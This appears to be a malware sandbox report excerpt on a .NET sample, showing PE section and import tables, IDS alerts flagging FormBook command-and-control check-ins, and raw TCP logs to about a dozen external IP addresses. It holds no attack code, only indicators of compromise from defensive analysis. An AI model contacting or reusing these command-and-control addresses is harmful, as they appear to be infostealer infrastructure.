                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbaf88 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x1720 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb8fe0 | 0xb9000 | 2681d2cd27ec28f4bdba76764ce7023e | False | 0.9540500950168919 | data | 7.95788200827039 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbc000 | 0x1720 | 0x1800 | 7fcbb9d7315293f588ab54c4c8fbedf4 | False | 0.7862955729166666 | data | 6.9286601127334855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x200 | 2e0b8e9b6825d01448eab31c2eb3e274 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xbc0c8 | 0x12cf | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9123572170301142
RT_GROUP_ICON | 0xbd3a8 | 0x14 | data |  |  | 1.05
RT_VERSION | 0xbd3cc | 0x350 | data |  |  | 0.4009433962264151

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T01:37:50.382091+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP
2024-10-31T01:37:50.382091+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP
2024-10-31T01:38:07.598005+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49778 | 103.120.80.111 | 80 | TCP
2024-10-31T01:38:10.137350+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49793 | 103.120.80.111 | 80 | TCP
2024-10-31T01:38:12.532648+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49809 | 103.120.80.111 | 80 | TCP
2024-10-31T01:38:15.034711+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49825 | 103.120.80.111 | 80 | TCP
2024-10-31T01:38:15.034711+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49825 | 103.120.80.111 | 80 | TCP
2024-10-31T01:38:21.176902+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49861 | 217.160.0.60 | 80 | TCP
2024-10-31T01:38:23.716558+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49876 | 217.160.0.60 | 80 | TCP
2024-10-31T01:38:26.423593+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49889 | 217.160.0.60 | 80 | TCP
2024-10-31T01:38:29.080670+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49905 | 217.160.0.60 | 80 | TCP
2024-10-31T01:38:29.080670+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49905 | 217.160.0.60 | 80 | TCP
2024-10-31T01:38:35.120489+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49941 | 161.97.142.144 | 80 | TCP
2024-10-31T01:38:37.663882+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49957 | 161.97.142.144 | 80 | TCP
2024-10-31T01:38:40.214668+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49973 | 161.97.142.144 | 80 | TCP
2024-10-31T01:38:42.753096+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49989 | 161.97.142.144 | 80 | TCP
2024-10-31T01:38:42.753096+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49989 | 161.97.142.144 | 80 | TCP
2024-10-31T01:38:49.039066+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50019 | 13.248.169.48 | 80 | TCP
2024-10-31T01:38:51.239627+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 13.248.169.48 | 80 | TCP
2024-10-31T01:38:53.724340+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 13.248.169.48 | 80 | TCP
2024-10-31T01:38:56.317263+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | TCP
2024-10-31T01:38:56.317263+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | TCP
2024-10-31T01:39:02.342212+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 198.251.84.200 | 80 | TCP
2024-10-31T01:39:04.999354+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 198.251.84.200 | 80 | TCP
2024-10-31T01:39:07.607846+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 198.251.84.200 | 80 | TCP
2024-10-31T01:39:10.123446+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50027 | 198.251.84.200 | 80 | TCP
2024-10-31T01:39:10.123446+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50027 | 198.251.84.200 | 80 | TCP
2024-10-31T01:39:15.979873+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 172.67.154.67 | 80 | TCP
2024-10-31T01:39:18.539676+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 172.67.154.67 | 80 | TCP
2024-10-31T01:39:21.058398+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 172.67.154.67 | 80 | TCP
2024-10-31T01:39:23.645578+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50031 | 172.67.154.67 | 80 | TCP
2024-10-31T01:39:23.645578+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50031 | 172.67.154.67 | 80 | TCP
2024-10-31T01:39:31.671887+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 20.2.249.7 | 80 | TCP
2024-10-31T01:39:34.217233+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 20.2.249.7 | 80 | TCP
2024-10-31T01:39:36.767358+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50034 | 20.2.249.7 | 80 | TCP
2024-10-31T01:39:39.279821+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50035 | 20.2.249.7 | 80 | TCP
2024-10-31T01:39:39.279821+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50035 | 20.2.249.7 | 80 | TCP
2024-10-31T01:39:45.651484+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 203.161.49.193 | 80 | TCP
2024-10-31T01:39:48.238767+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 203.161.49.193 | 80 | TCP
2024-10-31T01:39:50.762782+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 203.161.49.193 | 80 | TCP
2024-10-31T01:39:53.314383+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50039 | 203.161.49.193 | 80 | TCP
2024-10-31T01:39:53.314383+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50039 | 203.161.49.193 | 80 | TCP
2024-10-31T01:39:59.069159+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 199.59.243.227 | 80 | TCP
2024-10-31T01:40:01.570939+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 199.59.243.227 | 80 | TCP
2024-10-31T01:40:04.158593+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50042 | 199.59.243.227 | 80 | TCP
2024-10-31T01:40:06.732795+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50043 | 199.59.243.227 | 80 | TCP
2024-10-31T01:40:06.732795+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50043 | 199.59.243.227 | 80 | TCP
2024-10-31T01:40:12.916689+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 217.76.156.252 | 80 | TCP
2024-10-31T01:40:15.514697+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 217.76.156.252 | 80 | TCP
2024-10-31T01:40:18.091170+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50046 | 217.76.156.252 | 80 | TCP
2024-10-31T01:40:20.625049+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50047 | 217.76.156.252 | 80 | TCP
2024-10-31T01:40:20.625049+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50047 | 217.76.156.252 | 80 | TCP
2024-10-31T01:40:26.733225+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50048 | 144.76.190.39 | 80 | TCP
2024-10-31T01:40:29.377192+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 144.76.190.39 | 80 | TCP
2024-10-31T01:40:31.852057+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50050 | 144.76.190.39 | 80 | TCP
2024-10-31T01:40:34.373602+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50051 | 144.76.190.39 | 80 | TCP
2024-10-31T01:40:34.373602+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50051 | 144.76.190.39 | 80 | TCP
2024-10-31T01:40:40.563346+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50052 | 34.92.128.59 | 80 | TCP
2024-10-31T01:40:43.108008+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50053 | 34.92.128.59 | 80 | TCP
                                                                                                                                                                              2024-10-31T01:40:45.639263+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005434.92.128.5980TCP
                                                                                                                                                                              2024-10-31T01:40:48.154933+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45005534.92.128.5980TCP
                                                                                                                                                                              2024-10-31T01:40:48.154933+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005534.92.128.5980TCP
                                                                                                                                                                              2024-10-31T01:40:54.436275+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450056152.42.255.4880TCP
                                                                                                                                                                              2024-10-31T01:40:56.969192+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450057152.42.255.4880TCP
                                                                                                                                                                              2024-10-31T01:40:59.498644+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450058152.42.255.4880TCP
                                                                                                                                                                              2024-10-31T01:41:02.061922+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450059152.42.255.4880TCP
                                                                                                                                                                              2024-10-31T01:41:02.061922+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450059152.42.255.4880TCP
                                                                                                                                                                              Oct 31, 2024 01:38:34.262687922 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:34.271497965 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:34.276292086 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:35.120378971 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:35.120441914 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:35.120450974 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:35.120488882 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:35.240669012 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:35.240849972 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:35.809070110 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:36.813709021 CET4995780192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:36.818558931 CET8049957161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:36.818631887 CET4995780192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:36.828089952 CET4995780192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:36.832910061 CET8049957161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:37.663824081 CET8049957161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:37.663837910 CET8049957161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:37.663882017 CET4995780192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:37.790931940 CET8049957161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:37.791008949 CET4995780192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:38.342334986 CET4995780192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:39.360320091 CET4997380192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:39.365437984 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.365525007 CET4997380192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:39.374445915 CET4997380192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:39.379589081 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379673004 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379683018 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379693031 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379796982 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379812002 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379820108 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379829884 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:39.379842043 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:40.214448929 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:40.214463949 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:40.214668036 CET4997380192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:40.342219114 CET8049973161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:40.342518091 CET4997380192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:40.889074087 CET4997380192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:41.908122063 CET4998980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:41.912957907 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:41.913067102 CET4998980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:41.920389891 CET4998980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:41.925263882 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:42.752948999 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:42.752974987 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:42.752990007 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:42.752999067 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:42.753096104 CET4998980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:42.879787922 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:42.879882097 CET4998980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:42.880784035 CET4998980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 31, 2024 01:38:42.885652065 CET8049989161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:47.969141960 CET5001980192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:47.973989964 CET805001913.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:47.974050999 CET5001980192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:47.996860981 CET5001980192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:48.002005100 CET805001913.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:49.037944078 CET805001913.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:49.039066076 CET5001980192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:49.498528957 CET5001980192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:49.503597975 CET805001913.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:50.519382954 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:50.524286985 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:50.531385899 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:50.539037943 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:50.544965029 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:51.239577055 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:51.239626884 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:52.045438051 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:52.050363064 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.067063093 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:53.072102070 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.075571060 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:53.087395906 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:53.092649937 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092660904 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092711926 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092720032 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092782021 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092806101 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092861891 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092870951 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.092904091 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.724256992 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:53.724339962 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:54.592359066 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:54.597322941 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:55.610574961 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:55.615607023 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:55.615674973 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:55.625713110 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:55.630465031 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:56.282108068 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:56.317158937 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:56.317262888 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:56.318068027 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 31, 2024 01:38:56.323148012 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:01.363193989 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:01.368082047 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:01.368278980 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:01.389820099 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:01.394675970 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:02.291898012 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:02.342211962 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:02.455888987 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:02.459176064 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:02.990371943 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:04.001215935 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:04.006536007 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:04.006606102 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:04.017527103 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:04.022341967 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:04.924788952 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055646896 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055669069 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055809021 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055816889 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055845976 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055855036 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.722810984 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.762703896 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.762782097 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:51.561249018 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.581082106 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.586108923 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:52.593122005 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.597141981 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.601978064 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:53.275543928 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:53.314136028 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:53.314383030 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:53.317055941 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:53.324616909 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:58.403058052 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:58.407861948 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:58.409137964 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:58.421084881 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:58.425920010 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.066325903 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.066339970 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.069159031 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:59.098050117 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.101115942 CET5004080192.168.2.4199.59.243.227
